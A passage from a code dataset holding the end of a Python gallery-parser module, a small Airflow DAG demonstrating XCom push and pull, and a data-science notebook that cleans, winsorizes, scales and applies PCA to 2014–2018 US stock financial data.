extra_gal_data:\n current_url = link_from_gid_token_fjord(extra_gal_data['current_gid'], extra_gal_data['current_key'])\n\n logger.info(\n \"Gallery: {} has current in: {}, adding to queue\".format(\n gallery_entry.get_absolute_url(),\n current_url\n )\n )\n galleries_to_add[current_url] = []\n\n if self.own_settings.auto_process_first:\n if 'first_gid' in extra_gal_data and 'first_key' in extra_gal_data:\n first_url = link_from_gid_token_fjord(extra_gal_data['first_gid'], extra_gal_data['first_key'])\n\n logger.info(\n \"Gallery: {} has first in: {}, adding to queue\".format(\n gallery_entry.get_absolute_url(),\n first_url\n )\n )\n galleries_to_add[first_url].extend(['--link-newer', str(gallery_entry.gid)])\n\n if self.own_settings.auto_process_parent:\n if 'parent_gid' in 
extra_gal_data and 'parent_key' in extra_gal_data:\n parent_url = link_from_gid_token_fjord(extra_gal_data['parent_gid'], extra_gal_data['parent_key'])\n\n logger.info(\n \"Gallery: {} has parent in: {}, adding to queue\".format(\n gallery_entry.get_absolute_url(),\n parent_url\n )\n )\n galleries_to_add[parent_url].extend(['--link-child', str(gallery_entry.gid)])\n\n if self.settings.workers.web_queue and galleries_to_add:\n list_galleries_to_add = [[x] + galleries_to_add[x] for x in galleries_to_add.keys()]\n for gallery_to_add in list_galleries_to_add:\n self.settings.workers.web_queue.enqueue_args_list(gallery_to_add)\n\n def is_current_link_non_current(self, gallery_data: 'GalleryData') -> bool:\n if 'current_gid' in gallery_data.extra_data:\n return True\n return False\n\n\nAPI = (\n Parser,\n)\n","repo_name":"pandabuilder/pandachaika","sub_path":"core/providers/panda/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":25783,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"37"} +{"seq_id":"31133288793","text":"from airflow import DAG\nfrom datetime import datetime\nfrom airflow.operators import BashOperator, DummyOperator, PythonOperator\nfrom airflow.utils.dates import days_ago\nfrom datetime import timedelta\n\n\ndef push_function(ti, **kwargs):\n \"\"\"\n Simple Python Function to push value\n :return:\n \"\"\"\n a = 1\n b = 2\n c = a + b\n ti.xcom_push(key='c', value=c)\n return a+b\n\n\ndef receive_function(ti, **kwargs):\n \"\"\"\n to receive the value from XCOM\n :param ti: cross function element\n :return:\n \"\"\"\n output = ti.xcom_pull(key='c', task_ids=['Xcom_Push'])\n print(output)\n\n\ndag_arguments = {\n 'Owner': 'Sai',\n 'depends_on_past': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5)\n}\n\ndag = DAG(\n dag_id='Xcom_Push_Pull',\n default_args=dag_arguments,\n description='A simple tutorial DAG',\n schedule_interval=timedelta(days=1),\n start_date=days_ago(2)\n)\n\ndummy_task = DummyOperator(\n task_id='Start',\n dag=dag\n)\n\npush_task = PythonOperator(\n task_id='Xcom_Push',\n python_callable=push_function,\n provide_context=True,\n dag=dag\n)\n\npull_task = PythonOperator(\n task_id='Xcom_Pull',\n python_callable=receive_function,\n provide_context=True,\n dag=dag\n)\n\ndummy_task >> push_task >> pull_task","repo_name":"saiprashanthts1995/Airflow_Project","sub_path":"Dags/xcom_push_pull.py","file_name":"xcom_push_pull.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32520263708","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport scipy\nimport seaborn as sns\n\nimport missingno as msno\n\n# pd.set_option('display.max_columns', None)\n# pd.set_option('display.max_rows', None)\n\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\nimport sklearn.preprocessing\nfrom sklearn import metrics\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import GridSearchCV\n\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import SVC\n\nfrom sklearn.preprocessing import RobustScaler\nfrom sklearn.model_selection import 
train_test_split, GridSearchCV\nfrom sklearn.metrics import recall_score, accuracy_score, confusion_matrix, f1_score\nfrom sklearn.metrics import precision_score, auc, roc_auc_score, roc_curve, precision_recall_curve\n\nfrom sklearn.decomposition import PCA, IncrementalPCA\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\n\nfrom sklearn.linear_model import Ridge, Lasso\nfrom sklearn.feature_selection import RFE\n# from xgboost import XGBClassifier\n\nfrom sklearn.linear_model import LogisticRegression\nimport statsmodels.api as sm\nfrom sklearn import metrics\n\nfrom sklearn.metrics import mean_squared_error\n\nfrom sklearn.ensemble import GradientBoostingClassifier #GBM algorithm\n# Training the model on the train data\nfrom sklearn.linear_model import LogisticRegression\nimport statsmodels.api as sm\nfrom sklearn import metrics\n\n\n\nfrom scipy.stats.mstats import winsorize\n\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import StandardScaler \n\nfrom sklearn.decomposition import PCA\nfrom imblearn.over_sampling import SMOTE, RandomOverSampler as smot\nfrom imblearn.under_sampling import NearMiss, RandomUnderSampler\nfrom imblearn.combine import SMOTEENN, SMOTETomek\n\n\n# In[2]:\n\n\n# !pip install lazypredict\n\n\n# In[3]:\n\n\n# !pip uninstall scikit-learn -y\n\n\n# In[4]:\n\n\n# !pip install scikit-learn==0.23.1\n\n\n# In[5]:\n\n\n# import lazypredict\n\n\n# In[6]:\n\n\n# from lazypredict.Supervised import LazyClassifier\n\n\n# In[7]:\n\n\n# from lazypredict.Supervised import LazyClassifier\n# from sklearn.datasets import load_diabetes\n# from sklearn.model_selection import train_test_split\n# # from lazypredict.Supervised import LazyRegressor\n# # from sklearn import datasets\n# from sklearn.utils import shuffle\n# # import numpy as np\n\n\n# ### Reading CSV files\n\n# In[8]:\n\n\ndf_2014 = pd.read_csv(\"2014_Financial_Data.csv\")\ndf_2015 = pd.read_csv(\"2015_Financial_Data.csv\")\ndf_2016 = pd.read_csv(\"2016_Financial_Data.csv\")\ndf_2017 = pd.read_csv(\"2017_Financial_Data.csv\")\ndf_2018 = pd.read_csv(\"2018_Financial_Data.csv\")\n\n\n# In[9]:\n\n\nnasdaq = pd.read_csv(\"nasdaq.csv\")\n\n\n# In[10]:\n\n\nnasdaq.shape\n\n\n# In[11]:\n\n\nnasdaq.columns\n\n\n# In[12]:\n\n\nnasdaq.head()\n\n\n# In[13]:\n\n\nnasdaq.drop('Name', axis=1, inplace=True)\n\n\n# In[14]:\n\n\ndf_2014.shape\n\n\n# In[15]:\n\n\ndf_2015.shape\n\n\n# In[16]:\n\n\ndf_2016.shape\n\n\n# In[17]:\n\n\ndf_2017.shape\n\n\n# In[18]:\n\n\ndf_2018.shape\n\n\n# In[19]:\n\n\ndf_2014['Year'] = 2014\ndf_2015['Year'] = 2015\ndf_2016['Year'] = 2016\ndf_2017['Year'] = 2017\ndf_2018['Year'] = 2018\n\n\n# In[20]:\n\n\ndf_2014.columns\n\n\n# In[21]:\n\n\ndf_2014.rename(columns={'2015 PRICE VAR [%]':'Next_Year_Price_Var[%]'}, inplace=True)\ndf_2015.rename(columns={'2016 PRICE VAR [%]':'Next_Year_Price_Var[%]'}, inplace=True)\ndf_2016.rename(columns={'2017 PRICE VAR [%]':'Next_Year_Price_Var[%]'}, inplace=True)\ndf_2017.rename(columns={'2018 PRICE VAR [%]':'Next_Year_Price_Var[%]'}, inplace=True)\ndf_2018.rename(columns={'2019 PRICE VAR [%]':'Next_Year_Price_Var[%]'}, inplace=True)\n\n\n# In[22]:\n\n\ndf = pd.concat([df_2014, df_2015, df_2016, df_2017, df_2018], axis = 0)\n\n\n# In[23]:\n\n\ndf.shape\n\n\n# In[24]:\n\n\ndf.columns\n\n\n# In[25]:\n\n\ndf.head()\n\n\n# In[26]:\n\n\ndf.rename(columns={\"Unnamed: 0\": \"Symbol\"}, inplace=True)\n# df_2014.rename(columns={'2015 PRICE VAR 
[%]':'Next_Year_Price_Var[%]'}, inplace=True)\n\n\n# In[27]:\n\n\ndf = pd.merge(df, nasdaq, how=\"inner\", on=\"Symbol\")\n\n\n# In[28]:\n\n\ndf.shape\n\n\n# In[29]:\n\n\ndf.head()\n\n\n# In[30]:\n\n\ndf.Country.value_counts()\n\n\n# In[31]:\n\n\ndf.Country.isnull().sum()\n\n\n# In[ ]:\n\n\n\n\n\n# In[32]:\n\n\n#Next_Year_Price_Var[%] +ve ---> class = 1, if -ve -----> class = 0\ndf.drop('Next_Year_Price_Var[%]', axis=1, inplace=True)\n\n\n# In[33]:\n\n\ndf.rename(columns={\"Symbol\":\"Name\"}, inplace=True)\n\n\n# In[34]:\n\n\ndf.Name.nunique()\n\n\n# In[35]:\n\n\ndf.shape\n\n\n# In[36]:\n\n\ndf.info()\n\n\n# In[37]:\n\n\ndf.describe()\n\n\n# In[38]:\n\n\n## Removing \"Year\" because our future companies will have different years and it should not affect our final call\ndf.drop(\"Year\", axis=1, inplace=True)\n\n\n# In[39]:\n\n\n## Removing \"Name\" because our future companies will have different Name and it should not affect our final call\ndf.drop(\"Name\", axis=1, inplace=True)\n\n\n# In[40]:\n\n\ndf.head(2)\n\n\n# In[41]:\n\n\ndf.loc[(df.Country==\"United States\")].shape\n\n\n# In[42]:\n\n\ndf.loc[(df.Country==\"United States\")]\n\n\n# In[43]:\n\n\n# Selecting only United States\n\n\n# In[44]:\n\n\ndf = df.loc[(df.Country==\"United States\")]\n\n\n# In[45]:\n\n\ndf.drop('Country', axis=1, inplace=True)\n\n\n# ### Understanding Null Value Distribution\n\n# In[46]:\n\n\ndf.isnull().sum().sort_values(ascending=False)\n\n\n# In[47]:\n\n\n(df.isnull().sum() * 100 / len(df)).sort_values(ascending=False)\n\n\n# In[48]:\n\n\n(df.isnull().sum() * 100 / len(df)).sort_values(ascending=True).head(15)\n\n\n# In[49]:\n\n\n# count of columns that have some null values\ndf.isnull().any().sum()\n\n\n# In[50]:\n\n\n# No columns with all null values\ndf.columns[df.isnull().all()]\n\n\n# In[51]:\n\n\n# Defining a function to add the count/frequency values as annotation to histogram.\ndef annotate_graph(ax):\n    for bar in ax.patches: \n        ax.annotate(format((bar.get_height()), '.0f'), \n                    (bar.get_x() + bar.get_width() / 2, bar.get_height()), \n                    ha='center', va='center', \n                    size=10, xytext=(0, 8), \n                    textcoords='offset points')\n    return ax\n\n\n# In[52]:\n\n\n# Plotting histogram for the dataframe and columns having null values.\nplt.figure(figsize=(28,10))\n\nax = sns.histplot(round((df.isnull().sum()/len(df.index) * 100).sort_values(ascending=False), 2))\nax = annotate_graph(ax)\n\nax.set(xticks=np.arange(0,101))\nax.set(xlabel='Null value percentage', ylabel='Count of columns with null values')\nsns.despine()\nplt.tight_layout()\n\n\n# In[53]:\n\n\nmsno.matrix(df)\n\n\n# In[54]:\n\n\n# defining a function to get more than cutoff percent missing value\n\ndef get_missing_value_percentage(cutoff):\n    y = pd.DataFrame( round((df.isnull().sum()/len(df.index) * 100).sort_values(ascending=False), 2))\n    y.rename(columns={0:\"Percentage\"}, inplace=True)\n    y2 = y[y.Percentage>cutoff]\n    return y2\n\n\n# In[55]:\n\n\n# get columns with more than 70% missing values\ngreater_than_70 = get_missing_value_percentage(70)\n\n\n# In[56]:\n\n\nlen(greater_than_70)\n\n\n# In[57]:\n\n\ngreater_than_70\n\n\n# In[58]:\n\n\n# get columns with more than 50% missing values\ngreater_than_50 = get_missing_value_percentage(50)\n\n\n# In[59]:\n\n\nlen(greater_than_50)\n\n\n# In[60]:\n\n\ngreater_than_50\n\n\n# In[61]:\n\n\n# get columns with more than 20% missing values\ngreater_than_20 = get_missing_value_percentage(20)\ngreater_than_20\n\n\n# ### Removing Null Values\n\n# In[62]:\n\n\n# function to drop cols which have more than 20% null 
values\n\ndef remove_cols_with_nulls (df, threshold):\n myCol = list(df.columns)\n for col in myCol: \n percentage = (df[col].isnull().sum()/len(df[col]))*100\n if percentage>threshold:\n df.drop(col, axis=1, inplace=True)\n\n\n# In[63]:\n\n\ndf.shape\n\n\n# In[64]:\n\n\nremove_cols_with_nulls(df, 20)\n\n\n# In[65]:\n\n\ndf.shape\n\n\n# In[66]:\n\n\nlen(df.columns[(df.isnull().any())])\n\n\n# In[67]:\n\n\n# Deleting rows with any null value\ndf.dropna(how='all',axis=0, inplace=True) \n\n\n# In[68]:\n\n\n# Therefore, there is no row will all NULL values\ndf.shape\n\n\n# In[69]:\n\n\n# Deleting rows with any null value\ndf.dropna(how='any',axis=0, inplace=True) \n\n\n# In[70]:\n\n\ndf.shape\n\n\n# In[71]:\n\n\nmsno.matrix(df)\n\n\n# In[72]:\n\n\ndf.isnull().any().sum()\n\n\n# In[73]:\n\n\ndf.columns\n\n\n# In[74]:\n\n\ndf.select_dtypes('number')\n\n\n# In[75]:\n\n\ndf['R&D Expenses'].value_counts()\n\n\n# In[76]:\n\n\ndf.shape[0]\n\n\n# In[77]:\n\n\ndf['R&D Expenses'].value_counts(normalize=True).sort_values(ascending=False)[0]\n\n\n# In[78]:\n\n\n# more than 50% value of R&D expense is 0. Remove numeric cols with dominant values\n\n\n# In[79]:\n\n\ndf.operatingProfitMargin.value_counts().sort_values(ascending=False).iloc[0]\n\n\n# In[80]:\n\n\n#Code goes to except block when single value is met ---> which is SERIES and you cannot do simple indexing in SERIES\n\n\n# In[81]:\n\n\ncounter = 0\nfor col in list(df.select_dtypes('number').columns):\n try: \n val = df[col].value_counts(normalize=True).sort_values(ascending=False)[0]\n if(val>0.5):\n df.drop(col, axis=1, inplace=True)\n counter = counter+1\n except:\n val = df[col].value_counts(normalize=True).sort_values(ascending=False).iloc[0]\n if(val>0.5):\n df.drop(col, axis=1, inplace=True)\n counter = counter+1\n \n \nprint(\"Total Columns Deleted = \",counter)\n\n\n# In[82]:\n\n\ndf.shape\n\n\n# In[83]:\n\n\ndf.columns\n\n\n# In[84]:\n\n\ndf.select_dtypes(include='number')\n\n\n# In[85]:\n\n\ndf.select_dtypes(include='object')\n\n\n# In[86]:\n\n\ndf.select_dtypes(include='number').shape\n\n\n# In[87]:\n\n\ndf.select_dtypes(include='object').shape\n\n\n# In[88]:\n\n\ndf.select_dtypes(include='category').shape\n\n\n# In[89]:\n\n\ndf.shape\n\n\n# In[90]:\n\n\n# 155 cols ----> 154 number, 1 Object\n\n\n# In[91]:\n\n\ndf.Sector.value_counts()\n\n\n# In[92]:\n\n\nsector_list = list(df.Sector.unique())\n\n\n# In[93]:\n\n\nsector_list\n\n\n# In[94]:\n\n\npd.get_dummies(df.Sector, drop_first=True)\n\n\n# In[95]:\n\n\nSector_status = pd.get_dummies(df.Sector, drop_first=True)\n\n#Adding the result to the original housing dataframe\n\ndf = pd.concat([df, Sector_status], axis=1)\n\n\n# In[96]:\n\n\n# Droppig Sector Column as we are done with \ndf.drop(\"Sector\", axis=1, inplace=True)\n\n\n# In[97]:\n\n\ndf.shape\n\n\n# In[98]:\n\n\ndf.Energy.value_counts()\n\n\n# In[99]:\n\n\n# Sector Column will be dropped after Exploratory Data Analysis\n\n\n# In[100]:\n\n\ndf.head()\n\n\n# # Removing columns with single value\n\n# In[101]:\n\n\ndef removeSingleValue (col):\n length = len(df[col].value_counts())\n if (length<2):\n print(col)\n df.drop(col, axis=1, inplace=True)\n\n\n# In[102]:\n\n\nfor col in df.columns:\n removeSingleValue(col)\n\n\n# In[103]:\n\n\nnum_col = list(df.dtypes[df.dtypes !='object'].index)\n\n\n# In[104]:\n\n\nlen(num_col)\n\n\n# In[105]:\n\n\ndf.shape\n\n\n# ### Duplicate Row Checker\n\n# In[106]:\n\n\ndf.duplicated().sum()\n\n\n# In[107]:\n\n\n# Moving \"Class\" Column to end\ndf['Result'] = df.Class\ndf.drop(\"Class\", axis=1, 
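A side note on the dominant-value loop above: plain [0] indexing on a value_counts() Series is label-based, so it raises whenever 0 is not itself one of the column's values, which is what the try/except is papering over. Positional .iloc[0] works in both cases. A minimal sketch of the simpler variant (same df and 0.5 cutoff as above; columns are collected first so nothing is dropped mid-iteration):

dominant_cols = []
for col in df.select_dtypes('number').columns:
    # value_counts() already sorts descending, so .iloc[0] is the top share
    top_share = df[col].value_counts(normalize=True).iloc[0]
    if top_share > 0.5:
        dominant_cols.append(col)
df.drop(columns=dominant_cols, inplace=True)
print("Total Columns Deleted =", len(dominant_cols))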
inplace=True)\ndf = df.rename(columns={\"Result\":\"Class\"})\n\n\n# In[ ]:\n\n\n\n\n\n# In[108]:\n\n\ndf.head()\n\n\n# # Outlier Treatment\n\n# In[109]:\n\n\ndf.head()\n\n\n# ## Method 1 Standard Deviation Method\n# \n# Three standard deviations from the mean is a common cut-off in practice for identifying outliers in a Gaussian or Gaussian-like distribution. For smaller samples of data, perhaps a value of 2 standard deviations (95%) can be used, and for larger samples, perhaps a value of 4 standard deviations (99.9%) can be used.\n\n# In[110]:\n\n\ndf.shape\n\n\n# In[111]:\n\n\n# Extracting numerical columns from the telecom_df data frame.\nnumerical_cols = df.select_dtypes(include = np.number).columns.to_list()\n\n\n# In[112]:\n\n\n# calculate summary statistics\ndata = df[numerical_cols]\ndata_mean, data_std = np.mean(data), np.std(data)\n# identify outliers\ncut_off = data_std * 3\nlower, upper = data_mean - cut_off, data_mean + cut_off\n# identify outliers\noutliers = df[((df < lower) | (df > upper)).any(axis=1)]\nprint('Number of identified outliers: %d' % len(outliers))\n\n\n# In[113]:\n\n\n# remove outliers\noutliers_removed = df[~((df < lower) | (df > upper)).any(axis=1)]\nprint('Non-outlier observations: %d' % len(outliers_removed))\n\n\n# ## Method 2 IQR method\n# \n# The IQR can be used to identify outliers by defining limits on the sample values that are a factor k of the IQR below the 25th percentile or above the 75th percentile. The common value for the factor k is the value 1.5.\n\n# In[114]:\n\n\nQ1 = df.quantile(0.25)\nQ3 = df.quantile(0.75)\nIQR = Q3 - Q1\nprint(IQR)\n\n\n# In[115]:\n\n\noutliers_removed_IQR = df[~((df < (Q1 - 1.5 * IQR)) |(df > (Q3 + 1.5 * IQR))).any(axis=1)]\nprint('Non-outlier observations: %d' % len(outliers_removed_IQR))\n\n\n# ## Method 3: 99-1 percentile method\n\n# In[116]:\n\n\nQ1 = df.quantile(0.01)\nQ3 = df.quantile(0.99)\nIQR = Q3 - Q1\nprint(IQR)\n\n\n# In[117]:\n\n\noutliers_removed_IQR = df[~((df < (Q1 - 1.5 * IQR)) |(df > (Q3 + 1.5 * IQR))).any(axis=1)]\nprint('Non-outlier observations: %d' % len(outliers_removed_IQR))\n\n\n# In[118]:\n\n\n### We choose 99-1 percentile method for outlier treatment\ndf_99_1 = df[~((df < (Q1 - 1.5 * IQR)) |(df > (Q3 + 1.5 * IQR))).any(axis=1)]\n\n\n# In[119]:\n\n\ndf_99_1.shape\n\n\n# ## Method 4: 95-5 percentile method\n\n# In[120]:\n\n\nQ1 = df.quantile(0.05)\nQ3 = df.quantile(0.95)\nIQR = Q3 - Q1\n\n\n# In[121]:\n\n\noutliers_removed_IQR = df[~((df < (Q1 - 1.5 * IQR)) |(df > (Q3 + 1.5 * IQR))).any(axis=1)]\nprint('Non-outlier observations: %d' % len(outliers_removed_IQR))\n\n\n# In[122]:\n\n\n### We choose 95-5 percentile method for outlier treatment\ndf_95_5 = df[~((df < (Q1 - 1.5 * IQR)) |(df > (Q3 + 1.5 * IQR))).any(axis=1)]\n\n\n# In[123]:\n\n\ndf_95_5.shape\n\n\n# In[124]:\n\n\n# Selecting 99-1 percentile\n\n\n# In[125]:\n\n\ndf = df_99_1\n\n\n# # Observation\n# \n# We are losing a lot of data even if we perform 99-1 percentile outlier removal. 
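Methods 1 through 4 above all build the same boolean row mask and differ only in how the lower/upper bounds are computed, so the shared pattern can be factored out. A hedged sketch (the helper names are mine, not part of the original notebook):

import numpy as np
import pandas as pd

def stddev_bounds(frame, k=3):
    # Method 1: mean +/- k standard deviations, computed column-wise
    mu, sigma = frame.mean(), frame.std()
    return mu - k * sigma, mu + k * sigma

def quantile_bounds(frame, lo=0.25, hi=0.75, k=1.5):
    # Methods 2-4: IQR uses (0.25, 0.75), 99-1 uses (0.01, 0.99), 95-5 uses (0.05, 0.95)
    q_lo, q_hi = frame.quantile(lo), frame.quantile(hi)
    spread = q_hi - q_lo
    return q_lo - k * spread, q_hi + k * spread

def drop_outlier_rows(frame, lower, upper):
    # keep only rows that stay inside the bounds in every column
    mask = ((frame < lower) | (frame > upper)).any(axis=1)
    return frame[~mask]

Each method in the notebook is then just drop_outlier_rows(df, *bounds) with the matching bounds function.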
Therefore, we need to explore other techniques\n\n# In[126]:\n\n\ndf.head()\n\n\n# In[127]:\n\n\n(df.isnull().sum() * 100 / len(df)).sort_values(ascending=False)\n\n\n# In[128]:\n\n\ndf.shape\n\n\n# # Winsorize\n\n# In[129]:\n\n\nsorted(sector_list)\n\n\n# In[130]:\n\n\ndf_winow = pd.DataFrame()\nfor col in df:\n if (col not in sector_list):\n df_winow[col] = winsorize(df[col], (0.1, 0.1))\n else:\n df_winow[col] = df[col].values\n\n\n# In[131]:\n\n\ndf_winow.shape\n\n\n# In[132]:\n\n\ndf['Communication Services'].value_counts()\n\n\n# In[133]:\n\n\ndf_winow.shape\n\n\n# In[134]:\n\n\ndf_winow\n\n\n# In[135]:\n\n\ndf_winow.Utilities.value_counts()\n\n\n# In[136]:\n\n\ndf_winow.Energy.value_counts()\n\n\n# In[137]:\n\n\nhig_neg_corr = list(df_winow.corr()['Class'].sort_values(ascending=True).index[0:5])\n\nfig = plt.figure(figsize=(20,12))\n\nax0=fig.add_subplot(2,2,1)\nax1=fig.add_subplot(2,2,2)\nax2=fig.add_subplot(2,2,3)\nax3=fig.add_subplot(2,2,4)\n\nsns.boxplot(df_winow[hig_neg_corr[0]], hue=\"Class\", data=df_winow, ax=ax0)\nsns.boxplot(df_winow[hig_neg_corr[1]], hue=\"Class\", data=df_winow, ax=ax1)\nsns.boxplot(df_winow[hig_neg_corr[2]], hue=\"Class\", data=df_winow, ax=ax2)\nsns.boxplot(df_winow[hig_neg_corr[3]], hue=\"Class\", data=df_winow, ax=ax3)\n\nsns.despine()\nplt.tight_layout()\nplt.plot()\n\n\n# In[138]:\n\n\nhig_pos_corr = list(df_winow.corr()['Class'].sort_values(ascending=False).index[1:5])\n\nfig = plt.figure(figsize=(20,12))\n\nax0=fig.add_subplot(2,2,1)\nax1=fig.add_subplot(2,2,2)\nax2=fig.add_subplot(2,2,3)\nax3=fig.add_subplot(2,2,4)\n\nsns.boxplot(df_winow[hig_pos_corr[0]], hue=\"Class\", data=df_winow, ax=ax0)\nsns.boxplot(df_winow[hig_pos_corr[1]], hue=\"Class\", data=df_winow, ax=ax1)\nsns.boxplot(df_winow[hig_pos_corr[2]], hue=\"Class\", data=df_winow, ax=ax2)\nsns.boxplot(df_winow[hig_pos_corr[3]], hue=\"Class\", data=df_winow, ax=ax3)\n\nsns.despine()\nplt.tight_layout()\nplt.plot()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# ## 15 percentile - 85 percentile\n\n# In[139]:\n\n\ndf_winow2 = pd.DataFrame()\nfor col in df:\n if(col not in sector_list):\n df_winow2[col] = winsorize(df[col], (0.15, 0.15))\n if(col in sector_list):\n df_winow2[col] = df[col].values\n\n\n# In[140]:\n\n\ndf_winow2.shape\n\n\n# In[141]:\n\n\nhig_neg_corr = list(df_winow2.corr()['Class'].sort_values(ascending=True).index[0:5])\n\nfig = plt.figure(figsize=(20,12))\n\nax0=fig.add_subplot(2,2,1)\nax1=fig.add_subplot(2,2,2)\nax2=fig.add_subplot(2,2,3)\nax3=fig.add_subplot(2,2,4)\n\nsns.boxplot(df_winow2[hig_neg_corr[0]], hue=\"Class\", data=df_winow2, ax=ax0)\nsns.boxplot(df_winow2[hig_neg_corr[1]], hue=\"Class\", data=df_winow2, ax=ax1)\nsns.boxplot(df_winow2[hig_neg_corr[2]], hue=\"Class\", data=df_winow2, ax=ax2)\nsns.boxplot(df_winow2[hig_neg_corr[3]], hue=\"Class\", data=df_winow2, ax=ax3)\n\nsns.despine()\nplt.tight_layout()\nplt.plot()\n\n\n# In[142]:\n\n\nhig_pos_corr = list(df_winow2.corr()['Class'].sort_values(ascending=False).index[1:5])\n\nfig = plt.figure(figsize=(20,12))\n\nax0=fig.add_subplot(2,2,1)\nax1=fig.add_subplot(2,2,2)\nax2=fig.add_subplot(2,2,3)\nax3=fig.add_subplot(2,2,4)\n\nsns.boxplot(df_winow2[hig_pos_corr[0]], hue=\"Class\", data=df_winow2, ax=ax0)\nsns.boxplot(df_winow2[hig_pos_corr[1]], hue=\"Class\", data=df_winow2, ax=ax1)\nsns.boxplot(df_winow2[hig_pos_corr[2]], hue=\"Class\", data=df_winow2, ax=ax2)\nsns.boxplot(df_winow2[hig_pos_corr[3]], hue=\"Class\", data=df_winow2, ax=ax3)\n\nsns.despine()\nplt.tight_layout()\nplt.plot()\n\n\n# In[ 
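Unlike the quantile filters above, winsorize keeps every row and clamps the tail values instead, which is why df_winow keeps the same row count as df. A toy example of what the (0.1, 0.1) limits do:

import numpy as np
from scipy.stats.mstats import winsorize

x = np.arange(1, 21)           # 1..20, so the tails are easy to see
w = winsorize(x, (0.1, 0.1))   # clamp the lowest and highest 10% of values
print(x[:3], x[-3:])                          # [1 2 3] [18 19 20]
print(np.asarray(w)[:3], np.asarray(w)[-3:])  # [3 3 3] [18 18 18]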
]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[143]:\n\n\nfrom sklearn.feature_selection import VarianceThreshold\n\nvar_thr = VarianceThreshold(threshold = 0.15) #Removing both constant and quasi-constant\nvar_thr.fit(df_winow2)\n\nvar_thr.get_support()\n\n\n# In[144]:\n\n\nconcol = [column for column in df_winow2.columns \n if column not in df_winow2.columns[var_thr.get_support()]]\n\nfor features in concol:\n print(features)\n\n\n# In[145]:\n\n\nlen(concol)\n\n\n# In[146]:\n\n\ndf_winow2.shape\n\n\n# In[147]:\n\n\n# df_winow2.drop(concol, axis=1, inplace=True)\n\n\n# # Observation\n# \n# We get a balanced data with Winsorize 15-85\n\n# In[148]:\n\n\ndf = df_winow2\n\n\n# ## Train Test Split\n\n# In[149]:\n\n\nmy_cv = 5\n\n\n# In[150]:\n\n\nX = df.drop('Class', axis = 1)\ny = df[['Class']]\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size = 0.8, test_size = 0.2, random_state = 123)\n\nprint(X_train.shape)\nprint(y_train.shape)\nprint(X_test.shape)\nprint(y_test.shape)\n\n\n# In[151]:\n\n\ny_train_reshape = pd.DataFrame(y_train.values.reshape(-1,1))\nprint(\"Counts of label '1': {}\".format((y_train_reshape==1).sum()[0]))\nprint(\"Counts of label '0': {} \\n\".format((y_train_reshape==0).sum()[0]))\n\ny_train_1 = (y_train_reshape==1).sum()[0]\nprint(\"Percentage of Profitable Company : {}% \\n\".format(round(y_train_1/len(y_train_reshape)*100,2)))\n\n\n# # Scalers\n\n# In[152]:\n\n\n#Importing the PCA module\n\npca = PCA(random_state=42)\npca_again = PCA(0.95)\n\n\n# ## MinMax Scaler\n\n# In[153]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size = 0.8, test_size = 0.2, random_state = 123)\n\n\n# In[154]:\n\n\nscaler = MinMaxScaler()\n\n\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n\n\n# In[155]:\n\n\nX_train_pca_mm = pca_again.fit_transform(X_train)\n\n\n# In[156]:\n\n\nX_train_pca_mm.shape\n\n\n# In[157]:\n\n\n# Tranforming X_Test\nX_test_pca_mm = pca_again.transform(X_test)\nX_test_pca_mm.shape\n\n\n# In[158]:\n\n\n#Doing the PCA on the train data\npca.fit(X_train)\n\n\n# In[159]:\n\n\n#Making the screeplot - plotting the cumulative variance against the number of components\nget_ipython().run_line_magic('matplotlib', 'inline')\nfig = plt.figure(figsize = (12,8))\nplt.vlines(x = X_train_pca_mm.shape[1],ymax = 1,ymin = 0,colors = 'r',linestyles = '--')\nplt.hlines(y = 0.95, xmax = 70,xmin = 0,colors = 'g',linestyles = '--')\nplt.plot(np.cumsum(pca.explained_variance_ratio_))\nplt.xlabel('number of components')\nplt.ylabel('cumulative explained variance')\n\nsns.despine()\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n\n# In[160]:\n\n\npca = PCA(n_components=5)\n\n\n# In[161]:\n\n\nscaler = MinMaxScaler()\n\n\n# In[162]:\n\n\nscaled_df=df_winow2.copy()\nscaled_df=pd.DataFrame(scaler.fit_transform(scaled_df), columns=scaled_df.columns)\npca_fit = pca.fit(scaled_df)\n\n\n# In[ ]:\n\n\n\n\n\n# In[163]:\n\n\nfig = plt.figure(figsize=(14,5))\nPC_values = np.arange(pca_fit.n_components_) + 1\n\nplt.plot(PC_values, pca_fit.explained_variance_ratio_, 'o-', linewidth=2, color='blue')\nplt.title('Scree Plot')\nplt.xlabel('Principal Component')\nplt.ylabel('Variance Explained')\n\nplt.show()\n\n\n# In[164]:\n\n\nprint(pca_fit.explained_variance_ratio_)\n\n\n# ## StandardScaler\n\n# In[ ]:\n\n\n\n\n\n# In[165]:\n\n\n#Importing the PCA module\n\npca = PCA(random_state=42)\npca_again = PCA(0.95)\n\n\n# In[166]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size = 0.8, test_size = 0.2, random_state = 123)\n\n\n# 
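On the PCA(0.95) call used above: passing a float in (0, 1) makes scikit-learn pick the smallest number of components whose cumulative explained variance reaches that fraction, i.e. the point where the scree plot's cumulative curve crosses the 0.95 line. A small self-contained sketch on synthetic data:

import numpy as np
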